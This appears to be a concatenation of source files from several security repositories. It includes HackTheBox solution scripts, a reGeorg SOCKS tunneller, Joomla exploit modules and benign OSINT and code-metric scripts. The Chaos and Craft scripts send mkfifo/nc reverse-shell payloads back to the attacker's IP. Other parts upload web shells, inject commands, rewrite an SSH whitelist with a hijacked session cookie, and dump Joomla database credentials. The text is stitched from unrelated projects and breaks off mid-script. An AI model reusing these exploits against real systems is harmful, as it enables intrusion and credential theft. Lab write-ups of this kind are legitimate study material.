+ parts[0] kb.add('osint/dnsdomain/' + domain + '/A/' + host + "/" + record_data) self.fire("newDNSARecord") #else: # print record_type #print line.strip() def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new target to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Targetting " + t) # Find NS records ns_list = kb.get('osint/dnsdomain/' + t + '/NS/') ns_list2 = MyDNS.getRecord(t, "NS") for n in ns_list2: n = str(n)[:-1] ns_list.append(n) for ns in ns_list: try: xfr = MyDNS.getZoneXfr(ns, t) text = "" for k in xfr: text += xfr[k].to_text(k) + "\n" self.processZoneLine(xfr[k].to_text(k), t) if text: # make outfile outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + ns + "_" + Utils.getRandStr(10) # output to file Utils.writeFile(text, outfile) self.fire("newDNSZoneXfr") except Exception as e: print e return ``` #### File: modules/test/ct_crtsh.py ```python import requests import re def search(domain): base_url = "https://crt.sh/?q={}" wildcard_domain = "%25.{}".format(domain) url = base_url.format(wildcard_domain) ua = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1' req = requests.get(url, headers={'User-Agent': ua}) if req.ok: try: content = req.content.decode('utf-8') pattern = r'>(.*\.' + domain + ')<' regex = re.compile(pattern, re.IGNORECASE) data = [] for match in regex.finditer(content): data.append(match.group(1)) return list(set(data)) except Exception as err: print("Error retrieving information.") print err return None for i in search("rapid7.com"): print i ``` #### File: modules/test/hackettarget.py ```python import requests import re def search(domain): base_url = "https://api.hackertarget.com/hostsearch/?q={}" url = base_url.format(domain) ua = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1' req = requests.get(url, headers={'User-Agent': ua}) if req.ok: try: content = req.content.decode('utf-8') data = [] for row in content.split(): parts = row.split(",") print parts[0] + " " + parts[1] data.append(parts[0]) return list(set(data)) except Exception as err: print("Error retrieving information.") print err return None for i in search("rapid7.com"): print i ```
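A quick self-check of the record-parsing regex used in `processZoneLine` above; the sample zone line is made up, and `.lower()` mirrors what `fixStr` does before matching.

```python
# Verifying the zone-record regex from processZoneLine.
import re

line = "www.example.com. 3600 IN A 192.0.2.10"
m = re.match(r"(\S+?)\s+?(\d+?)\s+?(in)\s+?(\S+?)\s+(.*)", line.lower())
print(m.groups())  # ('www.example.com.', '3600', 'in', 'a', '192.0.2.10')
```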
{ "source": "8L4NK/HackTheBox", "score": 2 }
#### File: HackTheBox/Chaos/shell.py ```python import netifaces as ni import subprocess import requests def request(ip): data = 'content=%5Cimmediate%5Cwrite18%7Brm+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+{}+9191+%3E%2Ftmp%2Ff%7D&template=test2'.format(ip) requests.post('http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3/ajax.php', data=data, headers = {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'}) if __name__ == '__main__': try: ni.ifaddresses('tun0') ip = ni.ifaddresses('tun0')[ni.AF_INET][0]['addr'] print ip subprocess.Popen(["nc -lvnp 9191"], shell=True, stderr=subprocess.STDOUT) request(ip) except: pass ``` #### File: HackTheBox/Conceal/shell.py ```python import subprocess import requests import ftplib def main(): ftp() try: r = requests.get("http://10.10.10.116/upload/cmd.asp?cmd=powershell.exe%20-ExecutionPolicy%20Bypass%20C:%5Cinetpub%5Cwwwroot%5Cupload%5Cshell.ps1",verify=False,timeout=3) except: pass try: subprocess.call(['nc -lvnp 9191'], shell=True, stderr=subprocess.STDOUT) except: print('[*] Quitting netcat...') def ftp(): ftp = ftplib.FTP("10.10.10.116") ftp.login('anonymous', 'conceal') files = ['cmd.asp','shell.ps1'] for filename in files: file = open('files/{}'.format(filename),'rb') ftp.storbinary('STOR {}'.format(filename), file) file.close() ftp.quit() if __name__ == '__main__': main() ``` #### File: HackTheBox/Craft/craft.py ```python import requests, json import socket, subprocess import netifaces as ni from sys import exit from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) class Craft(object): def __init__(self, proxies='https://127.0.0.1:8080'): self.brew_api = 'https://api.craft.htb/api/brew/' self.login_api = 'https://api.craft.htb/api/auth/login' self.proxies = {'https':proxies} self.token = self.getToken() self.insertBrew() #self.getBrews() def getToken(self): r = requests.get(self.login_api, auth=('dinesh', '<PASSWORD>'), verify=False) json_response = json.loads(r.text) token = json_response['token'] return token def insertBrew(self): headers = { 'X-Craft-API-Token': self.token, 'Content-Type': 'application/json' } cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} 9191 >/tmp/f".format(ip) data = { "name":"artikrh", "brewer":"artikrh", "style":"artikrh", "abv":"""__import__('os').popen('{}').read()""".format(cmd) } # if eval('%s > 1' % request.json['abv']): try: r = requests.post(self.brew_api, headers=headers, json=data, timeout=2, verify=False) # proxies=self.proxies except: #subprocess.call(['nc -lvnp 9191'], shell=True, stderr=subprocess.STDOUT) print("""[*] Execute for PTY: python -c 'import pty;pty.spawn("/bin/sh");'""") pass def getBrews(self): r = requests.get(self.brew_api, verify=False) json_response = json.loads(r.text) print(json_response) if __name__ == '__main__': try: ip = ni.ifaddresses('tun0')[ni.AF_INET][0]['addr'] socket.gethostbyname('api.craft.htb') except socket.error: print('[*] Missing api.craft.htb entry in /etc/hosts. Exiting...') exit() except: print('[*] Failed to retrieve tun0 IP address. 
Is your VPN on?') exit() Craft() ``` #### File: HackTheBox/Flujab/allowssh.py ```python import requests,os import netifaces as ni from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) id_rsa = """ -----<KEY> <KEY> """ id_rsa = id_rsa.strip() def main(): ni.ifaddresses('tun0') ip = ni.ifaddresses('tun0')[ni.AF_INET][0]['addr'] cookies = { 'session': '0b7d4ec2fe297b3b36863a0020f503164fe53374', 'mp_df4919c7cb869910c1e188dbc2918807_mixpanel': '%7B%22distinct_id%22%3A%20%22168b141ea2d235-07f82fc062bb9b-3c6e4645-1fa400-168b141ea2e4e0%22%2C%22version%22%3A%20%222.1.25%22%2C%22platform%22%3A%20%22debian%22%2C%22platformUnmapped%22%3A%20%22debian%22%2C%22%24initial_referrer%22%3A%20%22%24direct%22%2C%22%24initial_referring_domain%22%3A%20%22%24direct%22%7D', } headers = { 'Host': 'sysadmin-console-01.flujab.htb:8080', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0', 'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Referer': 'https://sysadmin-console-01.flujab.htb:8080/view/notepad//etc/ssh/sshd_wl', 'Content-Type': 'application/json;charset=utf-8', 'Content-Length': '104', 'Connection': 'close', } params = ( ('encoding', 'utf-8'), ) data = 'sshd : {}\nsshd : {}'.format(ip,ip) response = requests.post('https://sysadmin-console-01.flujab.htb:8080/api/filesystem/write//etc/ssh/sshd_wl', headers=headers, params=params, cookies=cookies, data=data, verify=False) print '[*] Response code: {}'.format(response.status_code) print "[*] Run: ssh -i files/id_rsa [email protected] -t 'bash --noprofile'" if __name__ == '__main__': if not os.path.exists('files'): os.system('mkdir files') if not os.path.exists('files/id_rsa'): with open('files/id_rsa','w') as privkey: os.chmod("files/id_rsa", 0600) privkey.write(id_rsa) main() ``` #### File: Flujab/files/smtpserver.py ```python from datetime import datetime import asyncore,re import netifaces as ni from smtpd import SMTPServer class EmlServer(SMTPServer): no = 0 def process_message(self, peer, mailfrom, rcpttos, data): for line in data.splitlines(): if re.search('Ref:',line): print(line.split('Ref:',1)[1]) self.no += 1 def run(ip): foo = EmlServer(('{}'.format(ip), 25), None) print('[*] SMTP Server started') try: asyncore.loop() except KeyboardInterrupt: pass if __name__ == '__main__': ni.ifaddresses('tun0') ip = ni.ifaddresses('tun0')[ni.AF_INET][0]['addr'] run(ip) ``` #### File: HackTheBox/Fortune/rce.py ```python import requests from bs4 import BeautifulSoup from sys import exit def rce(): headers = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', } try: while True: cmd = raw_input("$ ") data = 'db=;{}'.format(cmd) html = requests.post('http://10.10.10.127/select', headers=headers, data=data, verify=False).text soup = BeautifulSoup(html,"lxml") out = soup.find('pre').text print out.replace('\n\n', '\n') except: exit() if __name__ == '__main__': rce() ``` #### File: HackTheBox/Hackback/reGeorgSocksProxy.py ```python import logging import argparse import urllib3 from threading import Thread from urlparse import urlparse from socket import * from threading import Thread from time import sleep # Constants SOCKTIMEOUT = 5 RESENDTIMEOUT = 300 VER = "\x05" METHOD = "\x00" SUCCESS = "\x00" SOCKFAIL = "\x01" 
NETWORKFAIL = "\x02" HOSTFAIL = "\x04" REFUSED = "\x05" TTLEXPIRED = "\x06" UNSUPPORTCMD = "\x07" ADDRTYPEUNSPPORT = "\x08" UNASSIGNED = "\x09" BASICCHECKSTRING = "Georg says, 'All seems fine'" # Globals READBUFSIZE = 1024 # Logging RESET_SEQ = "\033[0m" COLOR_SEQ = "\033[1;%dm" BOLD_SEQ = "\033[1m" BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8) LEVEL = {"INFO": logging.INFO, "DEBUG": logging.DEBUG, } logLevel = "INFO" COLORS = { 'WARNING': YELLOW, 'INFO': WHITE, 'DEBUG': BLUE, 'CRITICAL': YELLOW, 'ERROR': RED, 'RED': RED, 'GREEN': GREEN, 'YELLOW': YELLOW, 'BLUE': BLUE, 'MAGENTA': MAGENTA, 'CYAN': CYAN, 'WHITE': WHITE, } def formatter_message(message, use_color=True): if use_color: message = message.replace("$RESET", RESET_SEQ).replace("$BOLD", BOLD_SEQ) else: message = message.replace("$RESET", "").replace("$BOLD", "") return message class ColoredFormatter(logging.Formatter): def __init__(self, msg, use_color=True): logging.Formatter.__init__(self, msg) self.use_color = use_color def format(self, record): levelname = record.levelname if self.use_color and levelname in COLORS: levelname_color = COLOR_SEQ % (30 + COLORS[levelname]) + levelname + RESET_SEQ record.levelname = levelname_color return logging.Formatter.format(self, record) class ColoredLogger(logging.Logger): def __init__(self, name): FORMAT = "[$BOLD%(levelname)-18s$RESET] %(message)s" COLOR_FORMAT = formatter_message(FORMAT, True) logging.Logger.__init__(self, name, logLevel) if (name == "transfer"): COLOR_FORMAT = "\x1b[80D\x1b[1A\x1b[K%s" % COLOR_FORMAT color_formatter = ColoredFormatter(COLOR_FORMAT) console = logging.StreamHandler() console.setFormatter(color_formatter) self.addHandler(console) return logging.setLoggerClass(ColoredLogger) log = logging.getLogger(__name__) transferLog = logging.getLogger("transfer") class SocksCmdNotImplemented(Exception): pass class SocksProtocolNotImplemented(Exception): pass class RemoteConnectionFailed(Exception): pass class session(Thread): def __init__(self, pSocket, connectString): Thread.__init__(self) self.pSocket = pSocket self.connectString = connectString o = urlparse(connectString) try: self.httpPort = o.port except: if o.scheme == "https": self.httpPort = 443 else: self.httpPort = 80 self.httpScheme = o.scheme self.httpHost = o.netloc.split(":")[0] self.httpPath = o.path self.cookie = None if o.scheme == "http": self.httpScheme = urllib3.HTTPConnectionPool else: self.httpScheme = urllib3.HTTPSConnectionPool def parseSocks5(self, sock): log.debug("SocksVersion5 detected") nmethods, methods = (sock.recv(1), sock.recv(1)) sock.sendall(VER + METHOD) ver = sock.recv(1) if ver == "\x02": # this is a hack for proxychains ver, cmd, rsv, atyp = (sock.recv(1), sock.recv(1), sock.recv(1), sock.recv(1)) else: cmd, rsv, atyp = (sock.recv(1), sock.recv(1), sock.recv(1)) target = None targetPort = None if atyp == "\x01": # IPv4 # Reading 6 bytes for the IP and Port target = sock.recv(4) targetPort = sock.recv(2) target = "." 
.join([str(ord(i)) for i in target]) elif atyp == "\x03": # Hostname targetLen = ord(sock.recv(1)) # hostname length (1 byte) target = sock.recv(targetLen) targetPort = sock.recv(2) target = "".join([unichr(ord(i)) for i in target]) elif atyp == "\x04": # IPv6 target = sock.recv(16) targetPort = sock.recv(2) tmp_addr = [] for i in xrange(len(target) / 2): tmp_addr.append(unichr(ord(target[2 * i]) * 256 + ord(target[2 * i + 1]))) target = ":".join(tmp_addr) targetPort = ord(targetPort[0]) * 256 + ord(targetPort[1]) if cmd == "\x02": # BIND raise SocksCmdNotImplemented("Socks5 - BIND not implemented") elif cmd == "\x03": # UDP raise SocksCmdNotImplemented("Socks5 - UDP not implemented") elif cmd == "\x01": # CONNECT serverIp = target try: serverIp = gethostbyname(target) except: log.error("oeps") serverIp = "".join([chr(int(i)) for i in serverIp.split(".")]) self.cookie = self.setupRemoteSession(target, targetPort) if self.cookie: sock.sendall(VER + SUCCESS + "\x00" + "\x01" + serverIp + chr(targetPort / 256) + chr(targetPort % 256)) return True else: sock.sendall(VER + REFUSED + "\x00" + "\x01" + serverIp + chr(targetPort / 256) + chr(targetPort % 256)) raise RemoteConnectionFailed("[%s:%d] Remote failed" % (target, targetPort)) raise SocksCmdNotImplemented("Socks5 - Unknown CMD") def parseSocks4(self, sock): log.debug("SocksVersion4 detected") cmd = sock.recv(1) if cmd == "\x01": # Connect targetPort = sock.recv(2) targetPort = ord(targetPort[0]) * 256 + ord(targetPort[1]) target = sock.recv(4) sock.recv(1) target = ".".join([str(ord(i)) for i in target]) serverIp = target try: serverIp = gethostbyname(target) except: log.error("oeps") serverIp = "".join([chr(int(i)) for i in serverIp.split(".")]) self.cookie = self.setupRemoteSession(target, targetPort) if self.cookie: sock.sendall(chr(0) + chr(90) + serverIp + chr(targetPort / 256) + chr(targetPort % 256)) return True else: sock.sendall("\x00" + "\x91" + serverIp + chr(targetPort / 256) + chr(targetPort % 256)) raise RemoteConnectionFailed("Remote connection failed") else: raise SocksProtocolNotImplemented("Socks4 - Command [%d] Not implemented" % ord(cmd)) def handleSocks(self, sock): # This is where we setup the socks connection ver = sock.recv(1) if ver == "\x05": return self.parseSocks5(sock) elif ver == "\x04": return self.parseSocks4(sock) def setupRemoteSession(self, target, port): headers = {"X-CMD": "CONNECT", "X-TARGET": target, "X-PORT": port} self.target = target self.port = port cookie = None conn = self.httpScheme(host=self.httpHost, port=self.httpPort) # response = conn.request("POST", self.httpPath, params, headers) response = conn.urlopen('POST', self.connectString + "?cmd=connect&target=%s&port=%d" % (target, port), headers=headers, body="") if response.status == 200: status = response.getheader("x-status") if status == "OK": cookie = response.getheader("set-cookie") log.info("[%s:%d] HTTP [200]: cookie [%s]" % (self.target, self.port, cookie)) else: if response.getheader("X-ERROR") is not None: log.error(response.getheader("X-ERROR")) else: log.error("[%s:%d] HTTP [%d]: [%s]" % (self.target, self.port, response.status, response.getheader("X-ERROR"))) log.error("[%s:%d] RemoteError: %s" % (self.target, self.port, response.data)) conn.close() return cookie def closeRemoteSession(self): headers = {"X-CMD": "DISCONNECT", "Cookie": self.cookie} params = "" conn = self.httpScheme(host=self.httpHost, port=self.httpPort) response = conn.request("POST", self.httpPath + "?cmd=disconnect", params, headers) if response.status == 
200: log.info("[%s:%d] Connection Terminated" % (self.target, self.port)) conn.close() def reader(self): conn = urllib3.PoolManager() while True: try: if not self.pSocket: break data = "" headers = {"X-CMD": "READ", "Cookie": self.cookie, "Connection": "Keep-Alive"} response = conn.urlopen('POST', self.connectString + "?cmd=read", headers=headers, body="") data = None if response.status == 200: status = response.getheader("x-status") if status == "OK": if response.getheader("set-cookie") is not None: cookie = response.getheader("set-cookie") data = response.data # Yes I know this is horrible, but its a quick fix to issues with tomcat 5.x bugs that have been reported, will find a propper fix laters try: if response.getheader("server").find("Apache-Coyote/1.1") > 0: data = data[:len(data) - 1] except: pass if data is None: data = "" else: data = None log.error("[%s:%d] HTTP [%d]: Status: [%s]: Message [%s] Shutting down" % (self.target, self.port, response.status, status, response.getheader("X-ERROR"))) else: log.error("[%s:%d] HTTP [%d]: Shutting down" % (self.target, self.port, response.status)) if data is None: # Remote socket closed break if len(data) == 0: sleep(0.1) continue transferLog.info("[%s:%d] <<<< [%d]" % (self.target, self.port, len(data))) self.pSocket.send(data) except Exception, ex: raise ex self.closeRemoteSession() log.debug("[%s:%d] Closing localsocket" % (self.target, self.port)) try: self.pSocket.close() except: log.debug("[%s:%d] Localsocket already closed" % (self.target, self.port)) def writer(self): global READBUFSIZE conn = urllib3.PoolManager() while True: try: self.pSocket.settimeout(1) data = self.pSocket.recv(READBUFSIZE) if not data: break headers = {"X-CMD": "FORWARD", "Cookie": self.cookie, "Content-Type": "application/octet-stream", "Connection": "Keep-Alive"} response = conn.urlopen('POST', self.connectString + "?cmd=forward", headers=headers, body=data) if response.status == 200: status = response.getheader("x-status") if status == "OK": if response.getheader("set-cookie") is not None: self.cookie = response.getheader("set-cookie") else: log.error("[%s:%d] HTTP [%d]: Status: [%s]: Message [%s] Shutting down" % (self.target, self.port, response.status, status, response.getheader("x-error"))) break else: log.error("[%s:%d] HTTP [%d]: Shutting down" % (self.target, self.port, response.status)) break transferLog.info("[%s:%d] >>>> [%d]" % (self.target, self.port, len(data))) except timeout: continue except Exception, ex: raise ex break self.closeRemoteSession() log.debug("Closing localsocket") try: self.pSocket.close() except: log.debug("Localsocket already closed") def run(self): try: if self.handleSocks(self.pSocket): log.debug("Staring reader") r = Thread(target=self.reader, args=()) r.start() log.debug("Staring writer") w = Thread(target=self.writer, args=()) w.start() r.join() w.join() except SocksCmdNotImplemented, si: log.error(si.message) self.pSocket.close() except SocksProtocolNotImplemented, spi: log.error(spi.message) self.pSocket.close() except Exception, e: log.error(e.message) self.closeRemoteSession() self.pSocket.close() def askGeorg(connectString): connectString = connectString o = urlparse(connectString) try: httpPort = o.port except: if o.scheme == "https": httpPort = 443 else: httpPort = 80 httpScheme = o.scheme httpHost = o.netloc.split(":")[0] httpPath = o.path if o.scheme == "http": httpScheme = urllib3.HTTPConnectionPool else: httpScheme = urllib3.HTTPSConnectionPool conn = httpScheme(host=httpHost, port=httpPort) response = 
conn.request("GET", httpPath) if response.status == 200: if BASICCHECKSTRING == response.data.strip(): log.info(BASICCHECKSTRING) return True conn.close() return False if __name__ == '__main__': print """\033[1m \033[1;33m _____ _____ ______ __|___ |__ ______ _____ _____ ______ | | | ___|| ___| || ___|/ \| | | ___| | \ | ___|| | | || ___|| || \ | | | |__|\__\|______||______| __||______|\_____/|__|\__\|______| |_____| ... every office needs a tool like Georg <EMAIL> / @_w_m__ <EMAIL> / @trowalts <EMAIL> / @kamp_staaldraad \033[0m """ log.setLevel(logging.DEBUG) parser = argparse.ArgumentParser(description='Socks server for reGeorg HTTP(s) tunneller') parser.add_argument("-l", "--listen-on", metavar="", help="The default listening address", default="127.0.0.1") parser.add_argument("-p", "--listen-port", metavar="", help="The default listening port", type=int, default="8888") parser.add_argument("-r", "--read-buff", metavar="", help="Local read buffer, max data to be sent per POST", type=int, default="1024") parser.add_argument("-u", "--url", metavar="", required=True, help="The url containing the tunnel script") parser.add_argument("-v", "--verbose", metavar="", help="Verbose output[INFO|DEBUG]", default="INFO") args = parser.parse_args() if (args.verbose in LEVEL): log.setLevel(LEVEL[args.verbose]) log.info("Log Level set to [%s]" % args.verbose) log.info("Starting socks server [%s:%d], tunnel at [%s]" % (args.listen_on, args.listen_port, args.url)) log.info("Checking if Georg is ready") if not askGeorg(args.url): log.info("Georg is not ready, please check url") exit() READBUFSIZE = args.read_buff servSock = socket(AF_INET, SOCK_STREAM) servSock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) servSock.bind((args.listen_on, args.listen_port)) servSock.listen(1000) while True: try: sock, addr_info = servSock.accept() sock.settimeout(SOCKTIMEOUT) log.debug("Incomming connection") session(sock, args.url).start() except KeyboardInterrupt, ex: break except Exception, e: log.error(e) servSock.close() ``` #### File: Kryptos/files/challenge.py ```python __author__ = 'artikrh' import requests, re, socket import netifaces as ni from sys import exit from bs4 import BeautifulSoup """ - Requires Metasploit's auxiliary/server/capture/mysql - Hash format: $mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d - Hashcat code: 11200 """ def main(ip): s = requests.session() fetchtoken = s.get('http://10.10.10.129/').text soup = BeautifulSoup(fetchtoken, features="lxml") hidden_tags = soup.find_all("input", type="hidden") match = re.findall(r"([a-fA-F\d]{64})", str(hidden_tags[-1])) token = match[0] data = 'username=admin&password=<PASSWORD>&db=cryptor;host={}&token={}&login='.format(ip,token) headers = {'Content-Type': 'application/x-www-form-urlencoded'} r = s.post('http://10.10.10.129/', headers=headers, data=data, verify=False) phpsessid = requests.utils.dict_from_cookiejar(s.cookies)['PHPSESSID'] print '[*] Save this valid PHPSESSID cookie to your browser through inspect element: {}'.format(phpsessid) def check(ip): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) result = sock.connect_ex((ip,3306)) if result != 0: print '[*] MySQL is not remotely accessible! Exiting...' exit() sock.close() if __name__ == '__main__': ni.ifaddresses('tun0') ip = ni.ifaddresses('tun0')[ni.AF_INET][0]['addr'] check(ip) main(ip) ```
{ "source": "8L4NK/Profil3r", "score": 2 }
#### File: core/services/_tchat.py ```python from profil3r.app.modules.tchat.skype import Skype # Skype def skype(self): self.result["skype"] = Skype(self.config, self.permutations_list).search() # print results self.print_results("skype") return self.result["skype"] ``` #### File: core/services/_travel.py ```python from profil3r.app.modules.travel.tripadvisor import Tripadvisor # TripAdvisor def tripadvisor(self): self.result["tripadvisor"] = Tripadvisor(self.config, self.permutations_list).search() # print results self.print_results("tripadvisor") return self.result["tripadvisor"] ```
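Each service wrapper above follows the same template: instantiate the module with the shared config and permutations list, run `.search()`, cache the result under a key, print it, and return it. A hedged sketch of what a new service added in this style could look like; the `Github` module and its import path are assumptions, not part of Profil3r itself.

```python
# Hypothetical sketch following the same wrapper template as skype()/tripadvisor().
# The module path and the Github class are assumed for illustration only.
from profil3r.app.modules.forum.github import Github  # hypothetical module

# Github
def github(self):
    self.result["github"] = Github(self.config, self.permutations_list).search()

    # print results
    self.print_results("github")

    return self.result["github"]
```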
{ "source": "8L4NK/Zeebsploit", "score": 2 }
#### File: lib/modules/joomla_exploit.py
```python
import requests, re
from .color import R, G, B, Y, W

class com_fabrik:
    def joomla_com_fabrik(self, target, path, name):
        self.target = target
        self.path = path
        self.name = name
        requests.post(
            f"{self.target}/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=",
            data={
                "name": "me.php",
                "drop_data": "1",
                "overwrite": "1",
                "field_delimiter": ",",
                "text_delimiter": "&quot;",
                "option": "com_fabrik",
                "controller": "import",
                "view": "import",
                "task": "doimport",
                "Itemid": "0",
                "tableid": "0"
            },
            files={'userfile': (self.name, open(self.path, "rb"), "multipart/form-data")}
        )
        cek = requests.get(f"{self.target}/media/{self.name}")
        if cek.status_code == 200:
            print(f"{G}[*]{W} Success : {self.target}/media/{self.name}")
        else:
            print(f"{R}[x]{W} Failed, not vulnerable")

class com_ads_manager:
    def joomla_com_ads_manager(self, target, path, name):
        self.target = target
        self.path = path
        self.name = name
        requests.post(
            f"{self.target}/index.php?option=com_adsmanager&task=upload&tmpl=component",
            data={'name': self.name},
            files={'file': open(self.path, 'rb')}
        )
        cek = requests.get(f"{self.target}/tmp/plupload/{self.name}")
        if cek.status_code == 200:
            print(f"{G}[*]{W} Success : {self.target}/tmp/plupload/{self.name}")
        else:
            print(f"{R}[x]{W} Not vulnerable")

class joomanager_config:
    def joomla_manager_get_config(self, target):
        self.target = target
        resp = requests.get(
            f"{self.target}/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php"
        ).text
        if 'JConfig' in resp:
            host = re.findall("host = '(.*)';", resp)[0]
            user = re.findall("user = '(.*)';", resp)[0]
            pwd = re.findall("password = '(.*)';", resp)[0]
            db = re.findall("db = '(.*)';", resp)[0]
            print(f"{G}[*]{W} Vulnerable")
            print(f"Host : {host}\nUser : {user}\nPassword : {pwd}\nDB : {db}")
        else:
            print(f'{R}[x]{W} Not vulnerable')

class com_jdownload:
    def joomla_com_jdownloads_file_upload(
            self,
            target,
            path,
            name,
            email,
            description
    ):
        self.target = target
        self.path = path
        self.name = name
        self.email = email
        self.description = description
        requests.post(
            f"{self.target}/index.php?option=com_jdownloads&Itemid=0&view=upload",
            data={
                'name': self.name,
                'mail': self.email,
                'catlist': '1',
                'filetitle': "407 AEX",
                '2d1a8f3bd0b5cf542e9312d74fc9766f': 1,
                'send': 1,
                'senden': "Send file",
                'description': self.description,
                'option': "com_jdownloads",
                'view': "upload"
            },
            files={
                'file_upload': (self.name, open(self.path, 'rb'), 'multipart/form-data'),
                'pic_upload': ('407', open(self.path, 'rb'), 'multipart/form-data')
            }
        )
        cek = requests.get(f"{self.target}/images/jdownloads/screenshots/{self.name}")
        if cek.status_code == 200:
            print(f"{G}[*]{W} Success : {self.target}/images/jdownloads/screenshots/{self.name}")
        else:
            print(f"{R}[x]{W} Failed, not vulnerable")
```
Not Vulnerability ") ``` #### File: lib/tmp/temp.py ```python import sys,time,requests,os,re import platform as plat import readline ip = requests.get('https://www.myip.com').text prot = re.findall('id="ip">(.*?)</',ip)[0] B = '\033[94m' P = '\033[0m' K = '\033[93m' I = '\033[92m' A = '\033[91m' X = '\033[96m' logo = f""" - 407 AUTHENTIC EXPLOIT - {B} ____ _ ___ _ _ _ |_ / ___ ___ | |__ / __| _ __ | | ___ (_)| |{I} {P} version :{K} 2.0{P} {B} / / / -_)/ -_)| '_ \\__ \| '_ \| |/ _ \| || _| /___|\___|\___||_.__/|___/| .__/|_|\___/|_| \__| |_|{P} Codename :{X} JaxBCD{P} Your IP :{K} {prot}{P} platform :{I} {plat.system()} {plat.node()} {plat.release()} {plat.version()} {plat.machine()} {plat.processor()}{P} user@host :{A} {os.getlogin()}{P}@{A}{plat.node()}{P} """ def __name(): a = '[\033[92m⣾\033[0m]', '[\033[92m⣽\033[0m]', '[\033[92m⣻\033[0m]', '[\033[92m⢿\033[0m]', '[\033[92m⡿\033[0m]', '[\033[92m⣟\033[0m]', '[\033[92m⣯\033[0m]', '[\033[92m⣷\033[0m]' for i in a: sys.stdout.write(' Starting Zeebsploit Framework\r - %s'%i) sys.stdout.flush() time.sleep(0.10) ```
{ "source": "8LabSolutions/Soldino-Poc", "score": 3 }
#### File: script/ccr/ccr.py
```python
import os
import datetime
import matplotlib.pyplot as plt
plt.rcParams.update({'figure.autolayout': True})
import pandas as pd
from getFileList import getFileList

def createFolder(directory):
    try:
        if not os.path.exists(directory):
            os.makedirs(directory)
    except OSError:
        print ('Error: Creating directory '+ directory)

def ccr(filename):
    comments = 0
    code = 0
    with open(filename, "r") as inp:
        flag = False
        for line in inp:
            l = line.strip()
            if l != '':  # non-empty line
                if flag == False:  # not inside a multi-line comment
                    if l[:2] == "//":  # inline comment
                        comments += 1
                    elif l[:2] == "/*" and l[-2:] == "*/":  # multi-line comment on a single line
                        comments += 1
                    elif l[:2] == "/*":  # entering a multi-line comment
                        flag = True
                    else:
                        code += 1
                else:  # flag == True: inside a multi-line comment
                    if l[-2:] == "*/":
                        flag = False
                    else:  # not */
                        comments += 1
    #print comments
    #print code
    #ratio = float(comments)/float(code)
    #ratio = round(ratio,2)
    #print ratio
    return (comments, code)

# main
totalComments = 0
totalCode = 0
with open ('measurements.csv', "wt") as measurements:
    files = getFileList(["sol","js"])

    # remove problematic files
    if "../../src/flat-ui/scripts/flat-ui.min.js" in files:
        files.remove("../../src/flat-ui/scripts/flat-ui.min.js")
    if "../../src/flat-ui/scripts/flat-ui.js" in files:
        files.remove("../../src/flat-ui/scripts/flat-ui.js")
    if "../../src/flat-ui/scripts/application.js" in files:
        files.remove("../../src/flat-ui/scripts/application.js")

    for file in files:
        comment, code = ccr(file)  # THIS ONE CHANGES
        totalCode += code
        totalComments += comment
        '''
        print(file)
        print (comment)
        print (code)
        '''
        #print(file)
        newLine = file.split('/')[-1]+','+str(comment)+','+ str(code)+ '\n'
        measurements.write(str(newLine))

if (os.path.isfile('./ccrStatistics.csv')):
    # the file already exists, append to the end of it
    with open ('ccrStatistics.csv', 'at') as ccr:
        val = (float(totalComments)/float(totalCode)) * 100
        line = str(datetime.datetime.now().isoformat()[:10])+','+str(round(val, 2))+'\n'
        ccr.write(line)
else:
    # the file does not exist yet, create it with a header
    print('Note: creating the new file ccrStatistics.csv')
    with open ('ccrStatistics.csv', 'wt') as ccr:
        header = 'data,valore\n'
        val = (float(totalComments)/float(totalCode)) * 100
        line = str(datetime.datetime.now().isoformat()[:10])+','+str(round(val, 2))+'\n'
        ccr.write(header)
        ccr.write(line)

'''
# PLOTTING STUFF
df = pd.read_csv('ccrStatistics.csv')
ccr_valori = df['valore'].tolist()
ccr_date = df['data'].tolist()

plt.plot(ccr_date, ccr_valori, label="CCR\nover time")

gap = int(len(ccr_valori)/5)
#print(len(ccr_date))
counter = 0
for label in plt.gca().get_xaxis().get_ticklabels():
    print(gap)
    print(counter%gap)
    if counter % gap != 0:
        label.set_visible(False)
    counter += 1

plt.legend(bbox_to_anchor=(1.04,1), loc="upper left")
plt.subplots_adjust(right=0.8)
#plt.grid(False)
ax = plt.gca()
ax.grid(which='major', axis='y', linestyle='-.')
plt.xlabel('Date')
plt.ylabel('CCR')
plt.hlines(0.10, 0, max(ccr_date)+1, colors = 'y', linestyle ='solid', label = 'acceptable')
plt.hlines(0.20, 0, max(ccr_date)+1, colors = 'g', linestyle ='solid', label = 'preferable')
#plt.suptitle('test')
plt.xticks(rotation=45)
plt.tight_layout()

cartella='plot_ccr'
